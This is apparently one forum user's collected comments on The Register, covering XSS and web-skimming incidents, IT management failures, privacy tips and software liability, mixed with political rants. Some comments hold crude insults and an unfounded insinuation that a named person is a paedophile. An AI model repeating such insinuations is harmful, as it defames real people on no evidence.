Re: Content Security Policy
Thanks for the shout, I was a C, I am now A
Beers all round
317 posts • joined 30 Oct 2015
Thanks for the shout, I was a C, I am now A
Beers all round
This is clientside
With the way the world is going with CDN's serving god knows what, can you imagine end-users running outbound default DROP policies in their firewalls?
I tried that once a long time ago, and it was annoying then, this was before CDN's started becoming the norm
I'll be honest, XSS is a little confusing for me, there are non-persistent and persistent XSS
This was a persistent XSS attack, so they would have had to store their code somewhere, DB?
To get their code on there, they are probably exploiting either some unpatched or 0day vuln or SQL injection, but I am just guessing here
I'm purely going by the information in this screenshot
This was a persistent XSS attack AFAIK, some banks do carry out ad-hoc security checks for unusual transactions, for example phoning the customer. There is no ability as of yet to enter a 2FA OTP into a POS terminal
I fail to see how a bank can mitigate the failing of a separate business in securing their website, especially one which allows for financial data to be inputted. A better solution would have been for the compromised business to have at least some inkling what is going on in their infrastructure, but that costs money for staff to implement and carry out such a task. Unfortunately these business love money too much and dont want to properly invest in security
I have my own website, and while its not the most complicated by any means, I know evey single bit of code thats on there, can these businesses say the same about their websites?
One possible solution would be to cronjob a script which searches their DB's and code for :// and report back what it finds, but for that to work, they have to at the very least know what their estate looks like
I've seen this kind of clusterfuck before at a company I worked for briefly, they had no 2FA on their registra account but had a DNS record pointing vpn.TLD.com to a IP address which was a GoDaddy shared hosting webserver in the USA which had someting like 2,000 websites when checking reverse IP, they didnt have any offices in that region. Think about it, no 2FA on registra account, VPN pointing to shared hosting websites, in a country where they didnt have any presence. When I asked about it, nobody knew what it was. This company was a joke and was run by jokers
Looking at the whois data for that domain (new egg stats.com) it was created 13/08/2018, I suspect its not owned by NewEgg, and was registered by the crims, via a company in Panama no less, that place where all the criminals stash their ill-gotten gains
I did a whois on (new egg stats.com) out of curiosity, its been registered through a 3rd party, "WhoisGuard Protected" based in that bastion of criminals, Panama
Is this a national service that Panama offers, protecting criminals?
I wonder what the words are to their national anthem
It seems part of the chorus goes like this:
"It is necessary to cover with a veil from the past"
Another money-hoarding sociopath opens their mouth
“I want more money, whaaaaa”
These people literally feel no shame about their greed
There are more around than you think there are, and they’re usually more successful in life than none sociopaths, and they breed
I ran pi-hole for a while, I found it to be really buggy and was a little concerned it was running as root, considering the amount of buggyness I experienced
I call it muppetry
“After several hours, Joe finally gave up on logic and reason, and simply told the cabinet that he could talk to plants and that they wanted water.”
This add-on can:
Access your data for all websites
Access browser tabs
"There is one permission in particular, “Access your data for all websites”, that we’ve gotten many questions about since the feature launched. The reason why it’s worded this way is because a web page can contain virtually anything, and some extensions need to read everything on it in order to perform an action based on what the page contains.
For example, an ad blocker needs to read all web page content to identify and remove ad code. A password manager needs to detect and write to username and password fields. A shopping extension might need to read details of the products you’re searching for.
Since these types of extensions wouldn’t know whether any particular web page contains the bit it needs to modify until it’s loaded, and neither does Firefox, it needs access to everything on a page so it can look for and modify the appropriate parts. This means that in theory, while rare, a malicious developer could tell you their extension does one thing while it actually does something else."
Thankfully, most people in this world are honest and upright. Unfortunately, a disingenuous monetary system means sometimes people will be tempted to defraud others.
Too many companies rely on their single antivirus offering heavily and they think just because its reported a binary as clean, that it is actually clean of malicious code. The amount of times I have uploaded binaries that have been downloaded from official website to VirusTotal and found them to be compromised is happening more often.
I only have to give the example of Shellter to prove my point, I've used this and tested it against Security Essentials and others, they do not fare well in detections
When you think you know everything, you're never going to improve your learning
I know I am smart, because I know I know nothing
“Use it to enforce the basics such as mandating a six-digit unlock code that has to be changed regularly”
I thougt we’d move on since that out-dated advice of making end-users change credentials often?
Well the likes of Pornhub dont seem to do age checks on user-submitted content
Not sure what is worse, children watching porn or children getting paid to do porn
"Further, the process of transformation, even if it brings revolutionary change, is likely to be a long one, absent some catastrophic and catalyzing event – like a new Pearl Harbor." - PNAC
Well Cisco certainly is on a Killing Spree™
Killing security that is...
"Why didn't Cisco pick up these vulnerabilities in the testing and debugging stage of these security devices"
Because doing the right thing, is inherently opposed to in the capitalist model, doing what profits is the only way in this economic model.
I'm giving humanity a confident and generous 10 years left on this rock before it burns
This is no different than those dickheads at M$ deciding their users dont need to see the file extensions, spawning all kinds of trickery, for example providing a file called evil.txt.exe and including a text file icon into the exe to convince users further that it is a text file
There is a unspecified prize for anyone who can figure out the thinking behind this.
Did you really just use the words intelligence and military in the same sentence?
"a section titled “Umbrage” that details the CIA’s ability to impersonate cyber-attack techniques used by Russia and other nation states."
Apparently, Eternal Blue was "stolen"
That's the best alibi ever, my dog ate my hacking tool and shat it out in NK
I found the 2hr+ podcast far more interesting than the brief toke on the spliff
To be fair, Thailand is a magnet for paedos, and just because he has a wife, it doesn't mean he isn't a paedo
Hopefully a PI is looking into this
Sometimes people just give you the creeps, and I suspect this guy gave Elon the creeps.
Do you mind telling the TV licensing gang of that little detail?
They seem to equate "no tv license" with "they need a tv license" irrespective of how someone uses their TV
Anybody who disbelieves this, I highly recommend you to cancel your TV license, remove all BBC channels from your tuned TV, and then watch the highly threatening letters roll in from the BBC tv licensing gang.
By all means vote down, it wont change this little fact
No idea why you have so many downvotes.
The BBC are happy enough to pay Gary Lineker, Chris Evans and Graham Norton, a ridiculous sum of cash for what is questionable talent.
If anybody has seen Idiocracy, it should be fairly obvious why TV is the way it is
Celebrity get me out of here?
If these programs are not the result of an ever increasingly stupid population, I dont know what it
Well, from my observation many of the university types do certainly think that once they completed their degree, that the learning is done and finished, and they can then start looking down their noses at us other self-educated types who didn't pay £9k PA for a "rarely present tutor" and are interested enough in the subject to be motivated to self-learn
I guess the overpriced degrees in university, breeds a kind of hubristic elitism
A bit like when people buy an overpriced product, and they wrongly equate high price with high quality
“The good work for all education is interest. Until there is interest there is no response"
Do you get paid enough though, for said misery?
By hacking crew, you surely mean scriptkiddy crew
Not sure why Minecraft is even mentioned, except to give it a bad name by associating it with this morons antics. Feuds happen in lots of different games, sometimes resulting in Swatting. The games are not at fault, its the low IQ idiots playing it with no idea how to behave in a society, that's the problem!
Are you sure that photo was taken when he was an adult?
He looks about 12
But I.T is a utility, like a toilet
When companies employ IT staff, in their minds, they're employing janitors
“is it really worth spending that many millions of pounds on 5G?”
But, but... SHINEY!!’
The Greek "gymnasein" (to train naked)
This is interesting, and my next visit to the gym will be too
Good luck trying to convince people to use 2FA, most people dont like to be inconvenienced and they get quite angry if something doesnt work in the way they demand
You only have to look at how many people pick bad passwords and recycle them across multiple websites, or increment them with number suffixes
Surey this is just technological natural selection and we should just let it run its course.
The result is, we will be left with less muppets and then it wont be such an uphill struggle and less time IT admins have to piss into the wind
Pull the other one
Junk phone more like it, with added crAppstore
Install Noscript (Be selective of which domains you allow, if a website doesnt work without scripting enabled on the TLD you're visiting, go elsewhere)
Delete cookies upon broswser closing
Dont install Flash
There are other ways and means of tracking such as screen resolution, user-agent string, the list is quite long, but enough of these datasets creates a fairly unique fingerprint.
I wish I could transport back to the nineties, the internet was so much better then, before it became commercial
Which is running as root
Well someone has to beta test these software houses untested code, it might as well be criminals if not the companies, who should show some responsibility for it
Hopefully some of their antics will deny CEO's of their grotesque salaries
Unlikely though, these sociopaths usually have golden goodbyes, unlike the fixed-term contractors who just get shafted.
Have you tried employing more staff?
What my experience (20 years) of working in the IT industry has shown me, is that company bosses don't like to invest in staff, they would rather have their 4 holidays a year than actually run a company with a full deck, it seems the skeleton crew is the norm these days.
I despair too, because most of these organisations I have had the sad opportunity to experience, have made me facepalm endlessly to the point my forehead is bruised.
1. A Managed services company used a common password to access customer machines (password-01)
2. The Owner of the said Managed Services company didnt even know what the WEEE directive was after I told him he couldnt just throw electronics into the normal bin
3. A technology manufacturer who developed a web app to work with their devices, had a support account which would obviously be easily guessed and the password was the same as the username
4. A telecommunications company used 'folder redirection' in their domain policy, but the folder permissions were incorrectly set to Full permissions for everyone, meaning everyone in the company could read and write everyother employees desktop folders, my documents, etc. This company wanted to be ISO 27001 accreddited Bwaaahahahaha
5. I once started at a company and was handed a laptop that had not been wiped since the previous owner, I asked for an ISO from MSDN and was told there weren't any available, and that he had a disc at home, I asked if it was from MSDN, and he said he "thought so", but wasnt sure
6. Same company, was not given a deskphone, and was told to order one from Ebay and claim it on expenses!
I could go on and on and on and on and on and on, about the clusterfuck that is, IT management
Cisco should have a sniff around their own firmware binaries, it seems someone in their organisation keeps adding in back doors to their router firmwares
I bet they outsourced their IT to some Managed Services outfit who are themselves “Managing” about 30 other companies IT systems with 3 members of staff.
But the upshot of this, is that the CEO, executives and shareholders received huge salaries / bonuses / dividends.
Business as usual...
The Internet of Shit™ strikes again
It seems no company is afraid of distributing shit and poorly tested code to their customers, be it Belkin, Samsung, Cisco, Draytek, my list could quite possibly be endless
I bet their profits are looking great though, the CEO and shareholders enjoying huge payouts
If only they invested more in testing and security, if only...
Maybe a law is needed, am I being too preemptive here?
So I’m just gonna say, HSTS preload
Maybe a software license is needed, I know this has been suggested before
I mean, I reckon I could have a go at driving a HGV and it will all work out ok
(I dont have a HGV license BTW)
"you can't say the same for any general-purpose OS"
Ok fair points, my analogy probably isn't the best. But still the point I was trying to express is that of lives being lost due to poor cultural practices. It's become a common and normal practice to patch "bugs", lets be clear here, they are blunders and we should refer to them as such. Some of these blunders result in serious harm.
At what stage in our technological development do we stop and say enough is enough, this shit needs to be properly frameworked into a best practices and enshrined in law. Companies are profiting from their shonky untested code, and we will start seeing it costing peoples lives.
Have company executives gone to jail because of negligence?
Could we see technology company executives going to jail because of negligence.
I hope so
The term zero-day for the most part means what you think it means, unknown to anti-virus definitions for example
But there can be "in the wild" zero-day expliots, meaning they are actively being exploited, but not sufficiently protected against. They are however still zero-days, but hopefully not zero-days for long.
Hope that makes sense
"I suspect that over time legal interpretation might change as software finds its way into more and more products and the difference hardware and software blurs, but at the moment that is the case."
I honestly think this idea needs to speed up. Too many software houses are pushing out shit (not properly reviewed / tested) code and expecting the public / customers to simply accept this as the status quo. Would we accept this level of ineptitude in the physical world? Absoutely not!
Can you imagine it, a bridge gets built, but then needs to be closed 18 thousand times for patches
When (and some might argue this is now) poorly coded software starts affecting peoples lives, there needs to be some accountability for shonky sloppy coding, simply putting a user license agreement saying you are not responsible for jack shit is not good enough anymore
If your software needs to be patched, time and time again, and then some more, you need to take a introspectional look at your software development cycle, perhaps not enough money is being invested into the testing phase and as a company you have decided to kick that particular conundrum down the path
I should mention the Tesla (BETA) autopilot which had a disclaimer to the driver that if they enabled it they acknowleged it was still BETA and accepts the risks with no liability to Telsa.
What the actual fuck, what choice did other roads users get?
This is the kind of "we're not responsble" malarky that needs to fucking change
Honestly, when you have a government which doesnt know the difference between a hashtag and hashing, what chance do we have to have a government to properly legislate for this technological clusterfuck waiting to happen. I'm no luddite but some people need to wake up and smell the impending technological signularity, before its too late
Biting the hand that feeds IT © 1998–2018